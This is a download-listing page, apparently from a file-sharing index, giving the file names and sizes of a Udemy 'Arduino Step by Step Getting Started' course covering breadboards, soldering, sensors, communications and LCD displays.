[FreeCourseLab.com] Udemy - Tech Explorations™ Arduino Step by Step Getting Started

mp4   Hot:160   Size:6.9 GB   Created:2019-08-03 16:11:04   Update:2021-12-13 14:28:34  

Download link

小提示:当迅雷提示“下载出错”或“无法下载”等字样时,并非资源有问题,请更换 bitcomet(比特彗星) 即可下载,或者使用迅雷5。

File List

  • 5. Prototyping basics/14. An introduction to protoboards.mp4 245.98 MB
    5. Prototyping basics/2. Using the breadboard.vtt 188.62 MB
    5. Prototyping basics/2. Using the breadboard.mp4 188.6 MB
    5. Prototyping basics/13. A demonstration of soldering a header onto a breakout board.mp4 171.68 MB
    15. The Liquid Crystal Display/3. LCD wiring in 4-bit parallel mode.mp4 156.44 MB
    12. Sensing distance/3. Wiring and understanding Trigger and Echo.mp4 143.17 MB
    2. Know your Arduino/2. Getting to know the Arduino Uno Atmega328P, USB, Shields.mp4 142.86 MB
    15. The Liquid Crystal Display/6. Connect LCD using the I2C adaptor.mp4 140.58 MB
    8. Measuring light and color/2. What is a photoresistor and how to wire it.mp4 138.26 MB
    4. Arduino boards/8. Introducing Arduino-compatible boards.vtt 136.81 MB
    4. Arduino boards/8. Introducing Arduino-compatible boards.mp4 136.79 MB
    15. The Liquid Crystal Display/7. Using the RGB LCD and buttons shield.vtt 126.91 MB
    15. The Liquid Crystal Display/7. Using the RGB LCD and buttons shield.mp4 126.89 MB
    1. Introduction to the course/3. Parts you will need.mp4 123.38 MB
    5. Prototyping basics/9. Introduction to soldering - the soldering iron.mp4 122.38 MB
    11. Detecting objects with the infrared motion sensor/3. A simple PIR experiment with an LED.mp4 117.47 MB
    2. Know your Arduino/3. Getting to know the Arduino Uno Pins, power, clock.mp4 116.78 MB
    14. Making noise with a buzzer/2. Introduction to the buzzer.mp4 104.28 MB
    8. Measuring light and color/6. Wiring the RGB Color sensor.mp4 101.85 MB
    8. Measuring light and color/7. Mini project copy a color to an RGB LED using an RGB Color sensor.mp4 101.34 MB
    5. Prototyping basics/3. Using jumper wires.mp4 100.41 MB
    3. Introduction to communications/2. Serial (UART) communications.mp4 100.18 MB
    13. Sensing sound/2. Introduction to the analog sound sensor.mp4 99.08 MB
    9. Measuring temperature, humidity and pressure/2. Using a DHT22 sensor to measure temperature and humidity.mp4 98.9 MB
    8. Measuring light and color/4. Using the Ultra-Violet light sensor.mp4 86.78 MB
    1. Introduction to the course/2. Tools you will need.mp4 86.64 MB
    10. Detecting acceleration/3. Wiring the ADXL335.mp4 84.4 MB
    2. Know your Arduino/4. Using the digital output pins.mp4 83.93 MB
    13. Sensing sound/4. A demonstration and sketch of the digital sound sensor.mp4 83.23 MB
    7. Introduction to Arduino programming/13. Digital output - how to control an LED.mp4 83.22 MB
    7. Introduction to Arduino programming/18. Wiring the RGB LED.mp4 81.57 MB
    5. Prototyping basics/4. The absolutely essential tools.mp4 80.36 MB
    15. The Liquid Crystal Display/5. Display sensor data in the LCD.mp4 79.7 MB
    7. Introduction to Arduino programming/16. Analog output - how to create a fading LED.mp4 76.94 MB
    8. Measuring light and color/3. How to select the appropriate fixed resistor for a photoresistor.mp4 75.65 MB
    3. Introduction to communications/3. I²C (TWI) communications.mp4 74.05 MB
    12. Sensing distance/4. How to calculate distance.mp4 74.05 MB
    3. Introduction to communications/4. SPI communications.mp4 73.25 MB
    7. Introduction to Arduino programming/14. Digital input - how to read the state of a button.mp4 71.85 MB
    9. Measuring temperature, humidity and pressure/9. Wiring the TMP36 and a demonstration sketch.mp4 69.38 MB
    10. Detecting acceleration/5. Write the sketch for detecting orientation with the ADXL335.mp4 67.29 MB
    5. Prototyping basics/10. Soldering - preparation and using holders.mp4 66.79 MB
    7. Introduction to Arduino programming/17. Introduction to the RGB (color) LED.mp4 66.02 MB
    9. Measuring temperature, humidity and pressure/16. Wiring the BMP180 and first sketch walkthrough.mp4 58.98 MB
    9. Measuring temperature, humidity and pressure/10. An alternate wiring of the TMP36.mp4 58.16 MB
    14. Making noise with a buzzer/4. Control the sound volume.mp4 57.71 MB
    7. Introduction to Arduino programming/15. Analog input - how to read the state of a potentiometer.mp4 56.4 MB
    7. Introduction to Arduino programming/20. Using a library to control an RGB LED with PWM.mp4 56.28 MB
    2. Know your Arduino/5. Using the digital input pins.mp4 54.52 MB
    10. Detecting acceleration/4. Plugging the ADXL335 directly in the Arduino, and detect its orientation.mp4 54.19 MB
    12. Sensing distance/2. Introduction to the ultrasonic distance sensor.mp4 52.4 MB
    5. Prototyping basics/6. Using the multimeter to measure voltage.mp4 52.36 MB
    9. Measuring temperature, humidity and pressure/3. An introduction to the Thermistor.mp4 52.1 MB
    6. The Arduino IDE/4. The Arduino IDE - Understanding the Preferences pane.mp4 51.95 MB
    9. Measuring temperature, humidity and pressure/11. An introduction to the MCP9808 for very accurate temperature readings.mp4 51.42 MB
    5. Prototyping basics/5. Powering your Arduino with power supplies.mp4 49.37 MB
    9. Measuring temperature, humidity and pressure/7. Thermistor improving the accuracy of analog readings with AREF.mp4 48.63 MB
    11. Detecting objects with the infrared motion sensor/4. A demonstration of using the PIR sensor with the Arduino.mp4 48.1 MB
    2. Know your Arduino/6. Using the analog output pins.mp4 47.84 MB
    9. Measuring temperature, humidity and pressure/4. Wiring the Thermistor.mp4 46.36 MB
    4. Arduino boards/7. Introducing the Arduino Pro Mini.mp4 45.07 MB
    13. Sensing sound/3. A demonstration and sketch of the analog sound sensor.mp4 44.05 MB
    5. Prototyping basics/8. The multimeter - Resistance and continuity.mp4 43.18 MB
    2. Know your Arduino/7. Using the analog input pins.mp4 43.07 MB
    9. Measuring temperature, humidity and pressure/8. An introduction to measuring temperature with the TMP36.mp4 41.95 MB
    6. The Arduino IDE/5. The Arduino IDE - Understanding the Menu items.mp4 41.29 MB
    11. Detecting objects with the infrared motion sensor/2. Introduction to the Passive infra-Red (PIR) motion sensor.mp4 41.15 MB
    4. Arduino boards/2. Meet some members of the Arduino family.mp4 41.02 MB
    4. Arduino boards/4. Introducing the Arduino Due.mp4 40 MB
    9. Measuring temperature, humidity and pressure/5. How to calculate the temperature from the thermistor resistance.mp4 39.86 MB
    10. Detecting acceleration/2. Introduction to detecting acceleration with the ADXL335..mp4 39.85 MB
    6. The Arduino IDE/2. An introduction to the Arduino IDE.mp4 39.12 MB
    15. The Liquid Crystal Display/2. Introduction to the LCD.mp4 38.83 MB
    5. Prototyping basics/12. Soldering - Simple maintenance tips for your solder iron.mp4 37.24 MB
    4. Arduino boards/5. Introducing the Arduino Zero.mp4 36.4 MB
    6. The Arduino IDE/6. How to upload a sketch to your Arduino.mp4 35.51 MB
    4. Arduino boards/3. Introducing the Arduino Mega 2560.mp4 34.96 MB
    1. Introduction to the course/4. How to get the most out of this course.mp4 34.61 MB
    7. Introduction to Arduino programming/6. Using variables.mp4 34.41 MB
    7. Introduction to Arduino programming/3. Understand the basic parts of an Arduino sketch.mp4 32.49 MB
    5. Prototyping basics/7. Using the multimeter to measure current.mp4 32.37 MB
    9. Measuring temperature, humidity and pressure/17. A first demo sketch for the BMP180.mp4 32.36 MB
    9. Measuring temperature, humidity and pressure/18. A second demo sketch for the BMP180.mp4 29.81 MB
    5. Prototyping basics/11. Soldering - using wire cutters and fume extractor.mp4 29.27 MB
    16. Video Responses/1. Why use 3 resistors for the RGB LED, vs. just one resistor on the cathode.mp4 28.73 MB
    7. Introduction to Arduino programming/4. Getting started with custom functions.mp4 28.17 MB
    8. Measuring light and color/5. An introduction to the RGB Color sensor.mp4 27.97 MB
    14. Making noise with a buzzer/3. Playing music.mp4 27.78 MB
    15. The Liquid Crystal Display/4. LCD demonstration sketch.mp4 24.82 MB
    9. Measuring temperature, humidity and pressure/14. MCP9808 A closer look at I2C addressing.mp4 24.68 MB
    6. The Arduino IDE/7. How to upload a sketch to your Arduino - For Windows users.mp4 23.97 MB
    4. Arduino boards/6. Introducing the Arduino 101.mp4 23.86 MB
    9. Measuring temperature, humidity and pressure/12. MCP9808 Wiring.mp4 23.17 MB
    7. Introduction to Arduino programming/21. Learning more with the Arduino language documentation.mp4 22.86 MB
    9. Measuring temperature, humidity and pressure/15. An introduction to measuring barometric pressure with the BMP180.mp4 22.28 MB
    9. Measuring temperature, humidity and pressure/6. Thermistor getting a temperature using a library.mp4 21.99 MB
    7. Introduction to Arduino programming/7. Understanding variable scope.mp4 21.89 MB
    11. Detecting objects with the infrared motion sensor/6. PIR sensor second demonstration sketch walkthrough.mp4 20.53 MB
    1. Introduction to the course/1. What is this course about.mp4 18.58 MB
    7. Introduction to Arduino programming/9. Introduction to control structures The if statement.mp4 16.74 MB
    7. Introduction to Arduino programming/11. Introduction to control structures The For statement.mp4 15.88 MB
    9. Measuring temperature, humidity and pressure/13. Using the MCP9808, demo and sketch walkthrough.mp4 13.75 MB
    7. Introduction to Arduino programming/12. Introduction to control structures The Switch statement.mp4 13.55 MB
    6. The Arduino IDE/3. Getting and installing the Arduino IDE.mp4 12.85 MB
    7. Introduction to Arduino programming/5. Creating custom functions and the return keyword.mp4 12.31 MB
    7. Introduction to Arduino programming/8. Understanding constants.mp4 11.95 MB
    7. Introduction to Arduino programming/10. Introduction to control structures The while statement.mp4 11.91 MB
    7. Introduction to Arduino programming/2. An introduction to Arduino programming.mp4 11.48 MB
    11. Detecting objects with the infrared motion sensor/5. PIR sensor first demonstration sketch walkthrough.mp4 11.22 MB
    7. Introduction to Arduino programming/19. RGB LED creating colors.mp4 10.16 MB
    6. The Arduino IDE/1. Introduction.mp4 5.45 MB
    7. Introduction to Arduino programming/1. Introduction.mp4 5.38 MB
    9. Measuring temperature, humidity and pressure/1. Introduction.mp4 5.19 MB
    12. Sensing distance/1. Introduction.mp4 5.05 MB
    3. Introduction to communications/1. Introduction.mp4 4.93 MB
    8. Measuring light and color/1. Introduction.mp4 4.73 MB
    4. Arduino boards/1. Introduction.mp4 4.1 MB
    15. The Liquid Crystal Display/1. Introduction.mp4 4.05 MB
    2. Know your Arduino/1. Introduction.mp4 3.88 MB
    11. Detecting objects with the infrared motion sensor/1. Introduction.mp4 2.85 MB
    10. Detecting acceleration/1. Introduction.mp4 2.85 MB
    5. Prototyping basics/1. Introduction.mp4 2.77 MB
    14. Making noise with a buzzer/1. Introduction.mp4 2.36 MB
    13. Sensing sound/1. Introduction.mp4 2.07 MB
    8. Measuring light and color/7.3 0420 - TCS34725 with RGB LED.jpg.jpg 152.21 KB
    8. Measuring light and color/6.1 0420 - TCS34725 4.pdf.pdf 114.73 KB
    9. Measuring temperature, humidity and pressure/2.7 0430 - DHT22.png.png 100.27 KB
    9. Measuring temperature, humidity and pressure/4.3 0440 - Thermistor 3V3.png.png 96.77 KB
    9. Measuring temperature, humidity and pressure/4.1 0440 - Thermistor 5V.png.png 94.28 KB
    15. The Liquid Crystal Display/3.2 0700 - LCD character screen DHT22.png.png 76.63 KB
    11. Detecting objects with the infrared motion sensor/3.2 0500 - Infrared sensor with Arduino.png.png 61.28 KB
    13. Sensing sound/3.4 0560 - Analog microphone.png.png 57.44 KB
    13. Sensing sound/4.2 0560 - Digital sound sensor.png.png 57.27 KB
    9. Measuring temperature, humidity and pressure/12.1 0460 - Temperature MCP9808.png.png 56.91 KB
    9. Measuring temperature, humidity and pressure/10.1 0450 - TMP36 Temperature sensor 3V3.png.png 54.93 KB
    9. Measuring temperature, humidity and pressure/9.3 0450 - TMP36 Temperature sensor 3V3.png.png 54.93 KB
    10. Detecting acceleration/2.1 0520 - ADXL335 accelerometer 2.png.png 53.62 KB
    10. Detecting acceleration/3.2 0520 - ADXL335 accelerometer 2.png.png 53.62 KB
    10. Detecting acceleration/4.1 0520 - ADXL335 accelerometer 2.png.png 53.62 KB
    10. Detecting acceleration/5.3 0520 - ADXL335 accelerometer 2.png.png 53.62 KB
    12. Sensing distance/3.1 0510 - Ultrasonic Sensor HC-SR04.png.png 52.93 KB
    10. Detecting acceleration/2.2 0520 - ADXL335 accelerometer 1.png.png 51.62 KB
    10. Detecting acceleration/3.1 0520 - ADXL335 accelerometer 1.png.png 51.62 KB
    10. Detecting acceleration/4.2 0520 - ADXL335 accelerometer 1.png.png 51.62 KB
    10. Detecting acceleration/5.1 0520 - ADXL335 accelerometer 1.png.png 51.62 KB
    9. Measuring temperature, humidity and pressure/10.2 0450 - TMP36 Temperature sensor 5V.png.png 51.37 KB
    9. Measuring temperature, humidity and pressure/9.2 0450 - TMP36 Temperature sensor 5V.png.png 51.37 KB
    8. Measuring light and color/4.6 0410 - UV Light Sensor.png.png 51.3 KB
    15. The Liquid Crystal Display/3.1 0700 LCD with sensor.png.png 47.01 KB
    15. The Liquid Crystal Display/3.3 0700 LCD.png.png 43.92 KB
    8. Measuring light and color/2.1 0400 - Photoresistor.png.png 37.9 KB
    8. Measuring light and color/3.2 0400 - Photoresistor.png.png 37.9 KB
    7. Introduction to Arduino programming/16. Analog output - how to create a fading LED.vtt 30.71 KB
    12. Sensing distance/2. Introduction to the ultrasonic distance sensor.vtt 26.28 KB
    2. Know your Arduino/2. Getting to know the Arduino Uno Atmega328P, USB, Shields.vtt 25.38 KB
    1. Introduction to the course/3. Parts you will need.vtt 23.75 KB
    1. Introduction to the course/4. How to get the most out of this course.vtt 21.78 KB
    6. The Arduino IDE/4. The Arduino IDE - Understanding the Preferences pane.vtt 20.25 KB
    7. Introduction to Arduino programming/3. Understand the basic parts of an Arduino sketch.vtt 17.79 KB
    10. Detecting acceleration/3. Wiring the ADXL335.vtt 17.41 KB
    9. Measuring temperature, humidity and pressure/2. Using a DHT22 sensor to measure temperature and humidity.vtt 17.13 KB
    6. The Arduino IDE/5. The Arduino IDE - Understanding the Menu items.vtt 16.87 KB
    2. Know your Arduino/3. Getting to know the Arduino Uno Pins, power, clock.vtt 16.83 KB
    7. Introduction to Arduino programming/14. Digital input - how to read the state of a button.vtt 16.49 KB
    2. Know your Arduino/4. Using the digital output pins.vtt 16.17 KB
    5. Prototyping basics/14. An introduction to protoboards.vtt 15.96 KB
    15. The Liquid Crystal Display/5. Display sensor data in the LCD.vtt 15.89 KB
    9. Measuring temperature, humidity and pressure/3. An introduction to the Thermistor.vtt 15.64 KB
    7. Introduction to Arduino programming/6. Using variables.vtt 15.43 KB
    2. Know your Arduino/5. Using the digital input pins.vtt 15.41 KB
    15. The Liquid Crystal Display/3. LCD wiring in 4-bit parallel mode.vtt 15.38 KB
    14. Making noise with a buzzer/2. Introduction to the buzzer.vtt 15.27 KB
    8. Measuring light and color/2. What is a photoresistor and how to wire it.vtt 15.2 KB
    1. Introduction to the course/2. Tools you will need.vtt 15.14 KB
    7. Introduction to Arduino programming/4. Getting started with custom functions.vtt 15.12 KB
    9. Measuring temperature, humidity and pressure/11. An introduction to the MCP9808 for very accurate temperature readings.vtt 15.1 KB
    7. Introduction to Arduino programming/13. Digital output - how to control an LED.vtt 15.03 KB
    12. Sensing distance/3. Wiring and understanding Trigger and Echo.vtt 14.95 KB
    11. Detecting objects with the infrared motion sensor/2. Introduction to the Passive infra-Red (PIR) motion sensor.vtt 14.95 KB
    7. Introduction to Arduino programming/20. Using a library to control an RGB LED with PWM.vtt 14.81 KB
    13. Sensing sound/4. A demonstration and sketch of the digital sound sensor.vtt 14.73 KB
    7. Introduction to Arduino programming/18. Wiring the RGB LED.vtt 14.49 KB
    5. Prototyping basics/9. Introduction to soldering - the soldering iron.vtt 14.31 KB
    11. Detecting objects with the infrared motion sensor/3.1 0500 - Infrared sensor.png.png 14.23 KB
    14. Making noise with a buzzer/3. Playing music.vtt 14.07 KB
    11. Detecting objects with the infrared motion sensor/4. A demonstration of using the PIR sensor with the Arduino.vtt 13.03 KB
    5. Prototyping basics/13. A demonstration of soldering a header onto a breakout board.vtt 12.85 KB
    8. Measuring light and color/4. Using the Ultra-Violet light sensor.vtt 12.67 KB
    7. Introduction to Arduino programming/2. An introduction to Arduino programming.vtt 12.46 KB
    13. Sensing sound/3. A demonstration and sketch of the analog sound sensor.vtt 12.25 KB
    6. The Arduino IDE/6. How to upload a sketch to your Arduino.vtt 12.15 KB
    5. Prototyping basics/6. Using the multimeter to measure voltage.vtt 12.13 KB
    8. Measuring light and color/7. Mini project copy a color to an RGB LED using an RGB Color sensor.vtt 11.88 KB
    7. Introduction to Arduino programming/9. Introduction to control structures The if statement.vtt 11.53 KB
    7. Introduction to Arduino programming/15. Analog input - how to read the state of a potentiometer.vtt 11.49 KB
    12. Sensing distance/4. How to calculate distance.vtt 11.49 KB
    2. Know your Arduino/7. Using the analog input pins.vtt 11.45 KB
    10. Detecting acceleration/2. Introduction to detecting acceleration with the ADXL335..vtt 11.09 KB
    4. Arduino boards/4. Introducing the Arduino Due.vtt 10.95 KB
    15. The Liquid Crystal Display/6. Connect LCD using the I2C adaptor.vtt 10.84 KB
    8. Measuring light and color/6. Wiring the RGB Color sensor.vtt 10.72 KB
    6. The Arduino IDE/7. How to upload a sketch to your Arduino - For Windows users.vtt 10.61 KB
    8. Measuring light and color/3. How to select the appropriate fixed resistor for a photoresistor.vtt 10.47 KB
    3. Introduction to communications/3. I²C (TWI) communications.vtt 10.45 KB
    3. Introduction to communications/2. Serial (UART) communications.vtt 10.37 KB
    6. The Arduino IDE/2. An introduction to the Arduino IDE.vtt 10.18 KB
    13. Sensing sound/2. Introduction to the analog sound sensor.vtt 10.05 KB
    5. Prototyping basics/4. The absolutely essential tools.vtt 10.03 KB
    8. Measuring light and color/5. An introduction to the RGB Color sensor.vtt 9.55 KB
    9. Measuring temperature, humidity and pressure/17. A first demo sketch for the BMP180.vtt 9.4 KB
    11. Detecting objects with the infrared motion sensor/3. A simple PIR experiment with an LED.vtt 9.32 KB
    2. Know your Arduino/6. Using the analog output pins.vtt 9.24 KB
    9. Measuring temperature, humidity and pressure/9. Wiring the TMP36 and a demonstration sketch.vtt 9.14 KB
    11. Detecting objects with the infrared motion sensor/6. PIR sensor second demonstration sketch walkthrough.vtt 8.92 KB
    9. Measuring temperature, humidity and pressure/4. Wiring the Thermistor.vtt 8.78 KB
    5. Prototyping basics/3. Using jumper wires.vtt 8.55 KB
    16. Video Responses/1. Why use 3 resistors for the RGB LED, vs. just one resistor on the cathode.vtt 8.51 KB
    7. Introduction to Arduino programming/5. Creating custom functions and the return keyword.vtt 8.45 KB
    7. Introduction to Arduino programming/8. Understanding constants.vtt 8.31 KB
    9. Measuring temperature, humidity and pressure/15. An introduction to measuring barometric pressure with the BMP180.vtt 8.23 KB
    4. Arduino boards/3. Introducing the Arduino Mega 2560.vtt 8.19 KB
    1. Introduction to the course/1. What is this course about.vtt 8.19 KB
    15. The Liquid Crystal Display/4. LCD demonstration sketch.vtt 8.08 KB
    7. Introduction to Arduino programming/17. Introduction to the RGB (color) LED.vtt 7.92 KB
    10. Detecting acceleration/5. Write the sketch for detecting orientation with the ADXL335.vtt 7.9 KB
    7. Introduction to Arduino programming/7. Understanding variable scope.vtt 7.75 KB
    9. Measuring temperature, humidity and pressure/8. An introduction to measuring temperature with the TMP36.vtt 7.74 KB
    5. Prototyping basics/8. The multimeter - Resistance and continuity.vtt 7.66 KB
    6. The Arduino IDE/3. Getting and installing the Arduino IDE.vtt 7.51 KB
    9. Measuring temperature, humidity and pressure/18. A second demo sketch for the BMP180.vtt 7.35 KB
    10. Detecting acceleration/4. Plugging the ADXL335 directly in the Arduino, and detect its orientation.vtt 7.31 KB
    9. Measuring temperature, humidity and pressure/14. MCP9808 A closer look at I2C addressing.vtt 7.25 KB
    9. Measuring temperature, humidity and pressure/10. An alternate wiring of the TMP36.vtt 7.23 KB
    3. Introduction to communications/4. SPI communications.vtt 7.14 KB
    5. Prototyping basics/12. Soldering - Simple maintenance tips for your solder iron.vtt 6.84 KB
    9. Measuring temperature, humidity and pressure/16. Wiring the BMP180 and first sketch walkthrough.vtt 6.7 KB
    4. Arduino boards/2. Meet some members of the Arduino family.vtt 6.66 KB
    15. The Liquid Crystal Display/2. Introduction to the LCD.vtt 6.46 KB
    4. Arduino boards/5. Introducing the Arduino Zero.vtt 6.46 KB
    7. Introduction to Arduino programming/21. Learning more with the Arduino language documentation.vtt 6.46 KB
    4. Arduino boards/7. Introducing the Arduino Pro Mini.vtt 6.27 KB
    14. Making noise with a buzzer/4. Control the sound volume.vtt 6.19 KB
    5. Prototyping basics/10. Soldering - preparation and using holders.vtt 6.07 KB
    5. Prototyping basics/7. Using the multimeter to measure current.vtt 5.86 KB
    9. Measuring temperature, humidity and pressure/6. Thermistor getting a temperature using a library.vtt 5.81 KB
    9. Measuring temperature, humidity and pressure/7. Thermistor improving the accuracy of analog readings with AREF.vtt 5.52 KB
    7. Introduction to Arduino programming/12. Introduction to control structures The Switch statement.vtt 5.49 KB
    8. Measuring light and color/2.3 0400 - Photoresistor partial.png.png 5.1 KB
    8. Measuring light and color/3.1 0400 - Photoresistor partial.png.png 5.1 KB
    11. Detecting objects with the infrared motion sensor/5. PIR sensor first demonstration sketch walkthrough.vtt 5.1 KB
    7. Introduction to Arduino programming/11. Introduction to control structures The For statement.vtt 4.84 KB
    9. Measuring temperature, humidity and pressure/5. How to calculate the temperature from the thermistor resistance.vtt 4.76 KB
    5. Prototyping basics/5. Powering your Arduino with power supplies.vtt 4.71 KB
    7. Introduction to Arduino programming/10. Introduction to control structures The while statement.vtt 4.63 KB
    9. Measuring temperature, humidity and pressure/13. Using the MCP9808, demo and sketch walkthrough.vtt 4.42 KB
    4. Arduino boards/6. Introducing the Arduino 101.vtt 4.39 KB
    6. The Arduino IDE/1. Introduction.vtt 3.15 KB
    7. Introduction to Arduino programming/1. Introduction.vtt 3.13 KB
    5. Prototyping basics/11. Soldering - using wire cutters and fume extractor.vtt 2.99 KB
    7. Introduction to Arduino programming/19. RGB LED creating colors.vtt 2.82 KB
    3. Introduction to communications/1. Introduction.vtt 2.41 KB
    12. Sensing distance/1. Introduction.vtt 2.4 KB
    8. Measuring light and color/1. Introduction.vtt 2.29 KB
    9. Measuring temperature, humidity and pressure/12. MCP9808 Wiring.vtt 2.16 KB
    15. The Liquid Crystal Display/1. Introduction.vtt 1.99 KB
    17. Conclusion/1. Recap what you have learned and what's next.html 1.62 KB
    2. Know your Arduino/1. Introduction.vtt 1.57 KB
    11. Detecting objects with the infrared motion sensor/1. Introduction.vtt 1.43 KB
    5. Prototyping basics/1. Introduction.vtt 1.32 KB
    13. Sensing sound/1. Introduction.vtt 1.31 KB
    10. Detecting acceleration/1. Introduction.vtt 1.22 KB
    9. Measuring temperature, humidity and pressure/1. Introduction.vtt 1.16 KB
    4. Arduino boards/1. Introduction.vtt 1.13 KB
    14. Making noise with a buzzer/1. Introduction.vtt 1.01 KB
    17. Conclusion/2. Other courses by Peter Dalmaris.html 463 B
    13. Sensing sound/4.1 Sketch on Github.html 182 B
    7. Introduction to Arduino programming/3.1 Learn about the setup() function.html 129 B
    [FreeCourseLab.com].url 126 B
    10. Detecting acceleration/6. End of section quiz.html 119 B
    11. Detecting objects with the infrared motion sensor/7. End of section quiz.html 119 B
    12. Sensing distance/5. End of section quiz.html 119 B
    13. Sensing sound/5. End of section quiz.html 119 B
    14. Making noise with a buzzer/5. End of section quiz.html 119 B
    15. The Liquid Crystal Display/8. End of section quiz.html 119 B
    2. Know your Arduino/8. End of section quiz.html 119 B
    3. Introduction to communications/5. End of section quiz.html 119 B
    4. Arduino boards/9. End of section quiz.html 119 B
    5. Prototyping basics/15. End of section quiz.html 119 B
    6. The Arduino IDE/8. End of section quiz.html 119 B
    7. Introduction to Arduino programming/22. End of section quiz.html 119 B
    8. Measuring light and color/8. End of section quiz.html 119 B
    9. Measuring temperature, humidity and pressure/19. End of section quiz.html 119 B
    2. Know your Arduino/5.1 Learn about pull-up and pull-down resistors.html 117 B
    9. Measuring temperature, humidity and pressure/6.2 The Github repository for the thermistor library.html 99 B
    4. Arduino boards/5.1 Arduino Zero product page.html 98 B
    4. Arduino boards/4.2 Arduino Due product page.html 97 B
    4. Arduino boards/6.1 Arduino 101 product page.html 97 B
    1. Introduction to the course/2.1 Tools list.html 86 B
    1. Introduction to the course/3.1 Parts list.html 86 B
    4. Arduino boards/3.1 Arduino Mega 2560 product page.html 86 B
    10. Detecting acceleration/2.3 Learn about the voltage regulator.html 84 B
    10. Detecting acceleration/2.4 ADXL335 Datasheet.html 84 B
    10. Detecting acceleration/3.3 Sketch 1 on Github.html 84 B
    10. Detecting acceleration/4.3 Sketch 1 on Github.html 84 B
    10. Detecting acceleration/5.2 Sketch 2 on Github.html 84 B
    11. Detecting objects with the infrared motion sensor/2.1 Learn about Absolute Zero.html 84 B
    11. Detecting objects with the infrared motion sensor/2.2 PIR sensor on Wikipedia.html 84 B
    11. Detecting objects with the infrared motion sensor/2.3 HC-SR501 datasheet.html 84 B
    11. Detecting objects with the infrared motion sensor/4.1 Sketch2 on Github.html 84 B
    11. Detecting objects with the infrared motion sensor/4.2 Sketch1 on Github.html 84 B
    11. Detecting objects with the infrared motion sensor/5.1 Sketch1 on Github.html 84 B
    11. Detecting objects with the infrared motion sensor/6.1 Sketch 2 on Github.html 84 B
    12. Sensing distance/2.1 Learn about ultrasounds.html 84 B
    12. Sensing distance/2.2 Learn about the ultrasonic transducer.html 84 B
    12. Sensing distance/2.3 Ultrasonic sensor datasheet.html 84 B
    12. Sensing distance/3.2 Learn more about the oscilloscope.html 84 B
    12. Sensing distance/4.1 Sketch on Github.html 84 B
    12. Sensing distance/4.2 Learn about pulseIn().html 84 B
    13. Sensing sound/2.1 Learn about signal processing.html 84 B
    13. Sensing sound/3.1 Sketch on Github.html 84 B
    13. Sensing sound/3.2 More about audio signal processing.html 84 B
    13. Sensing sound/3.3 Learn about loudness.html 84 B
    15. The Liquid Crystal Display/4.1 Sketch on Github.html 84 B
    15. The Liquid Crystal Display/5.1 Sketch on Github.html 84 B
    15. The Liquid Crystal Display/6.1 Sketch on Github.html 84 B
    15. The Liquid Crystal Display/7.1 MCP23017 datasheet.html 84 B
    2. Know your Arduino/3.1 Learn about communications protocols.html 84 B
    2. Know your Arduino/3.2 Recommended power supplies for the Arduino Uno.html 84 B
    2. Know your Arduino/5.2 Learn about floating pins.html 84 B
    2. Know your Arduino/6.1 Learn about PWM.html 84 B
    3. Introduction to communications/2.1 Learn about software serial.html 84 B
    3. Introduction to communications/2.2 Learn about UART.html 84 B
    3. Introduction to communications/2.3 Arduino Uno product page.html 84 B
    3. Introduction to communications/3.1 Learn about the communications bus.html 84 B
    3. Introduction to communications/3.2 I2C on Wikipedia.html 84 B
    3. Introduction to communications/3.3 Arduino Uno product page.html 84 B
    3. Introduction to communications/3.4 Answer to brain stretcher.html 84 B
    3. Introduction to communications/4.1 Full and half duplex communications.html 84 B
    4. Arduino boards/2.1 Arduino Uno product page.html 84 B
    4. Arduino boards/4.1 Learn about digital to analog converters.html 84 B
    4. Arduino boards/7.1 Arduino Pro Mini.html 84 B
    4. Arduino boards/8.1 Freetronics LeoStick.html 84 B
    4. Arduino boards/8.2 Digispark Pro.html 84 B
    4. Arduino boards/8.3 ESP2866.html 84 B
    4. Arduino boards/8.4 Particle Electron.html 84 B
    4. Arduino boards/8.5 NodeMCU.html 84 B
    5. Prototyping basics/13.1 Learn about soldering, tools and techniques.html 84 B
    5. Prototyping basics/6.1 Learn about multimeters.html 84 B
    5. Prototyping basics/7.1 Conventional flow of electricity.html 84 B
    5. Prototyping basics/7.2 Learn about the Ammeter.html 84 B
    5. Prototyping basics/9.1 Learn about solder.html 84 B
    6. The Arduino IDE/7.1 Learn more about Serial.read().html 84 B
    7. Introduction to Arduino programming/10.1 More about while.html 84 B
    7. Introduction to Arduino programming/11.1 More about for.html 84 B
    7. Introduction to Arduino programming/12.1 Arduino Language Reference.html 84 B
    7. Introduction to Arduino programming/12.2 More about switch...case.html 84 B
    7. Introduction to Arduino programming/13.1 Learn about pinMode.html 84 B
    7. Introduction to Arduino programming/13.2 Learn about digitalWrite.html 84 B
    7. Introduction to Arduino programming/13.3 Learn about delay.html 84 B
    7. Introduction to Arduino programming/14.1 Learn more about pull updown resistors.html 84 B
    7. Introduction to Arduino programming/14.2 Learn about relational operators.html 84 B
    7. Introduction to Arduino programming/15.1 Learn about analogRead.html 84 B
    7. Introduction to Arduino programming/15.2 Learn about the potentiometer.html 84 B
    7. Introduction to Arduino programming/16.1 Learn about PWM.html 84 B
    7. Introduction to Arduino programming/16.2 Learn about analogWrite.html 84 B
    7. Introduction to Arduino programming/16.3 Learn about map.html 84 B
    7. Introduction to Arduino programming/17.1 Learn about the RGB LED.html 84 B
    7. Introduction to Arduino programming/18.1 The constants defined in the Arduino language.html 84 B
    7. Introduction to Arduino programming/18.2 Sketch on Github.html 84 B
    7. Introduction to Arduino programming/18.3 Learn about define.html 84 B
    7. Introduction to Arduino programming/19.1 Sketch on Github.html 84 B
    7. Introduction to Arduino programming/20.1 ALA home on Github.html 84 B
    7. Introduction to Arduino programming/20.2 Learn more about classes.html 84 B
    7. Introduction to Arduino programming/20.3 Learn about analogWrite.html 84 B
    7. Introduction to Arduino programming/21.1 Arduino language reference.html 84 B
    7. Introduction to Arduino programming/3.2 Learn about millis().html 84 B
    7. Introduction to Arduino programming/9.1 Learn about the incrementdecrement operators.html 84 B
    7. Introduction to Arduino programming/9.2 More about if...else.html 84 B
    7. Introduction to Arduino programming/9.3 More about if.html 84 B
    8. Measuring light and color/2.2 Voltage divider.html 84 B
    8. Measuring light and color/3.3 Voltage divider calculator.html 84 B
    8. Measuring light and color/3.4 More about the photoresistor.html 84 B
    8. Measuring light and color/3.5 Voltage divider.html 84 B
    8. Measuring light and color/4.1 Ultraviolet light.html 84 B
    8. Measuring light and color/4.2 UV Index scale.html 84 B
    8. Measuring light and color/4.3 Sketch on Github.html 84 B
    8. Measuring light and color/4.4 UV index world record.html 84 B
    8. Measuring light and color/4.5 Analog UV light sensor product page.html 84 B
